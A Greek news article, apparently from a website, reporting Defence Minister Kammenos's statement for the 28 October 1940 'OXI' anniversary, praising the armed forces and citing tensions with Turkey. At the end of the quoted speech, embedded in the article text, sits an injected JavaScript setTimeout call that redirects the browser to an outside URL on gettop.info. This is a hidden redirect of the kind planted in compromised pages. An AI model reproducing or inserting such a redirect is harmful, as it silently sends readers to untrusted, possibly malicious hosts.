Καμμένος: Το αθάνατο ΟΧΙ μας υπενθυμίζει την αέναη πίστη στην υπεράσπιση της ελευθερίας

0
5

 

Mε την ευκαιρία του εορτασμού της εθνικής επετείου της 28ης Οκτωβρίου 1940, ο υπουργός Εθνικής Άμυνας εξαίρει τη διαρκή ετοιμότητα των ενόπλων δυνάμεων για την προάσπιση της ανεξαρτησίας, της κυριαρχίας και της εδαφικής ακεραιότητας της πατρίδας μας, «ειδικά σήμερα που εντείνεται, κυρίως από την πλευρά της Τουρκίας, η αμφισβήτηση του διεθνούς δικαίου και των διεθνών συνθηκών».

Ο κ. Καμμένος, επιπλέον, εξήρε την άμεση, συνεχή και καθοριστική συνεισφορά τους στο προσφυγικό πρόβλημα, «όπως επιβάλλεται από τις μακραίωνες παραδόσεις της φυλής μας, της αρωγής και της φιλοξενίας».

«Όλο το έθνος σας τιμά και σας ευχαριστεί, γιατί μας δίνετε το κουράγιο και τη δύναμη να αντεπεξέλθουμε στις γενικότερες προκλήσεις των καιρών, σε εθνικό και περιφερειακό επίπεδο. Γι’ αυτό η πολιτική ηγεσία του υπουργείου Εθνικής Άμυνας, ο πρωθυπουργός όπως και όλη η κυβέρνηση, μόνο λόγια ευγνωμοσύνης και αναγνώρισης έχουν να εκφράσουν για εσάς», ανέφερε χαρακτηριστικά.

Διαβεβαίωσε δε «για ακόμη μία φορά, ότι παρά τις δύσκολες δημοσιονομικές συνθήκες, τις αδικίες και τα αντικειμενικά προβλήματα, γίνεται συνεχής προσπάθεια σε συνεργασία με τη στρατιωτική ηγεσία για την επίλυση όλων των θεμάτων που απασχολούν τα στελέχη, έτσι ώστε να εκτελείτε απρόσκοπτα την υψηλή σας αποστολή».

«Το αθάνατο «ΟΧΙ» μας υπενθυμίζει όχι μόνο τους αγώνες του ελληνικού έθνους στο διάβα των αιώνων, αλλά και την αέναη πίστη του ελληνικού λαού στην υπεράσπιση των υψηλών αξιών της ελευθερίας και της δημοκρατίας. Η Ελλάδα στάθηκε όρθια, ως αντιπρόσωπος του πολιτισμένου κόσμου, ενάντια σε σκοτεινές δυνάμεις της εποχής εκείνης και επανέλαβε για άλλη μια φορά στην μακραίωνη ιστορία της το «μολών λαβέ», με το ηχηρό «ΟΧΙ». Μια λέξη που προκάλεσε την έκπληξη και το θαυμασμό όλου του κόσμου, ενώ παράλληλα, το απίστευτο θάρρος, ο ηρωισμός και η αδάμαστη ψυχή των Ελλήνων, κατέρριψαν τις υπερφίαλες φιλοδοξίες του φασισμού.

Καθώς το παρελθόν βιώνεται μέσα από τη μνήμη, το ηρωικό έπος του 1940 συντηρεί και ενδυναμώνει την προσδοκία και την ελπίδα για το μέλλον της Πατρίδας, αποτελώντας πηγή υπερηφάνειας και εθνικής ανάτασης για όλους τους Έλληνες» τονίζει μεταξύ άλλων ο κ. Καμμένος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here